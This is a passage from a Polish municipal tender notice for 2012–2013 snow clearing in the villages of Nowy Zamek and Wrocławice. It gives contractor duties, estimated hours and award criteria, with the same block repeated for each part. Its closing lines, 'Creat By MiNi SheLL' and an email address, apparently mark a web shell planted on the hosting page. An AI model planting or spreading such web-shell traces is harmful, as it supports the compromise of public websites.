Zamawiający zastrzega sobie prawo do wyboru najkorzystniejszej oferty w zakresie każdej części zamówienia osobno. Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość części zamówienia.
Wykonawca zobowiązany jest do stałego współdziałania  w przypadku Części nr 3, 4, 5, 6, 7, 8, 9, 10, 11 z sołtysami poszczególnych wiosek a w szczególności:
-Wykonawca przystąpi do wykonywania przedmiotu umowy niezwłocznie po telefonicznym wezwaniu przez Sołtysa lub samoistnie, niezwłocznie (telefonicznie) zawiadamiając o powyższym Sołtysa. 
-Podstawą ustalenia ilości godzin wykonywania przedmiotu umowy jest zatwierdzona przez Sołtysa dzienna ewidencja wykonanych usług prowadzona przez Wykonawcę według wzoru określonego w Załączniku nr 4  do umowy.
- Wykonawca przedłoży Sołtysowi do zatwierdzenia dzienną ewidencję wykonanych usług nie później niż w ciągu 2 dni od dnia realizacji przedmiotu umowy w danym dniu.  Sołtys potwierdza wykonanie przedmiotu umowy na ewidencji.
-Wynagrodzenia Wykonawcy płatne jest miesięcznie z dołu, na podstawie wszystkich zatwierdzonych przez Sołtysa w tym miesiącu dziennych ewidencji czasu pracy,
- Szacunkowe ilości godzin odśnieżania dla Części 3-11 wynoszą odpowiednio:
Części   Ogółem
3 - Gądkowice - 73 h
4- Godnowa -56h
5 - Gogołowice -	58 h
6- Olsza -	21h
7- Pracze -76h
8- Wodników Górny -39h 
9- Ruda Sułowska	-23h
10 - Nowy Zamek - 80h
11-Wrocławice -	97h 
pomnożone przez cenę jednostkową za 1 godzinę odśnieżania ramach każdej z Części 3-11 (w przypadku Części 10 z posypywaniem) podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. czas przejechania 1 km przy odśnieżaniu - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Część10 - obwód 10 sołectwo Nowy Zamek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość Części zamówienia.
Zamawiający zastrzega sobie prawo do wyboru najkorzystniejszej oferty w zakresie każdej części zamówienia osobno. Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość części zamówienia.
Wykonawca zobowiązany jest do stałego współdziałania  w przypadku Części nr 3, 4, 5, 6, 7, 8, 9, 10, 11 z sołtysami poszczególnych wiosek a w szczególności:
-Wykonawca przystąpi do wykonywania przedmiotu umowy niezwłocznie po telefonicznym wezwaniu przez Sołtysa lub samoistnie, niezwłocznie (telefonicznie) zawiadamiając o powyższym Sołtysa. 
-Podstawą ustalenia ilości godzin wykonywania przedmiotu umowy jest zatwierdzona przez Sołtysa dzienna ewidencja wykonanych usług prowadzona przez Wykonawcę według wzoru określonego w Załączniku nr 4  do umowy.
- Wykonawca przedłoży Sołtysowi do zatwierdzenia dzienną ewidencję wykonanych usług nie później niż w ciągu 2 dni od dnia realizacji przedmiotu umowy w danym dniu.  Sołtys potwierdza wykonanie przedmiotu umowy na ewidencji.
-Wynagrodzenia Wykonawcy płatne jest miesięcznie z dołu, na podstawie wszystkich zatwierdzonych przez Sołtysa w tym miesiącu dziennych ewidencji czasu pracy,
- Szacunkowe ilości godzin odśnieżania dla Części 3-11 wynoszą odpowiednio:
Części   Ogółem
3 - Gądkowice - 73 h
4- Godnowa -56h
5 - Gogołowice -	58 h
6- Olsza -	21h
7- Pracze -76h
8- Wodników Górny -39h 
9- Ruda Sułowska	-23h
10 - Nowy Zamek - 80h
11-Wrocławice -	97h 
pomnożone przez cenę jednostkową za 1 godzinę odśnieżania ramach każdej z Części 3-11 (w przypadku Części 10 z posypywaniem) podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. czas przejechania 1 km przy odśnieżaniu - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Część 11 - Obwód 11 sołectwo Wrocławice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość Części zamówienia.
Zamawiający zastrzega sobie prawo do wyboru najkorzystniejszej oferty w zakresie każdej części zamówienia osobno. Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość części zamówienia.
Wykonawca zobowiązany jest do stałego współdziałania  w przypadku Części nr 3, 4, 5, 6, 7, 8, 9, 10, 11 z sołtysami poszczególnych wiosek a w szczególności:
-Wykonawca przystąpi do wykonywania przedmiotu umowy niezwłocznie po telefonicznym wezwaniu przez Sołtysa lub samoistnie, niezwłocznie (telefonicznie) zawiadamiając o powyższym Sołtysa. 
-Podstawą ustalenia ilości godzin wykonywania przedmiotu umowy jest zatwierdzona przez Sołtysa dzienna ewidencja wykonanych usług prowadzona przez Wykonawcę według wzoru określonego w Załączniku nr 4  do umowy.
- Wykonawca przedłoży Sołtysowi do zatwierdzenia dzienną ewidencję wykonanych usług nie później niż w ciągu 2 dni od dnia realizacji przedmiotu umowy w danym dniu.  Sołtys potwierdza wykonanie przedmiotu umowy na ewidencji.
-Wynagrodzenia Wykonawcy płatne jest miesięcznie z dołu, na podstawie wszystkich zatwierdzonych przez Sołtysa w tym miesiącu dziennych ewidencji czasu pracy,
- Szacunkowe ilości godzin odśnieżania dla Części 3-11 wynoszą odpowiednio:
Części   Ogółem
3 - Gądkowice - 73 h
4- Godnowa -56h
5 - Gogołowice -	58 h
6- Olsza -	21h
7- Pracze -76h
8- Wodników Górny -39h 
9- Ruda Sułowska	-23h
10 - Nowy Zamek - 80h
11-Wrocławice -	97h 
pomnożone przez cenę jednostkową za 1 godzinę odśnieżania ramach każdej z Części 3-11 (w przypadku Części 10 z posypywaniem) podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. czas przejechania 1 km przy odśnieżaniu - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com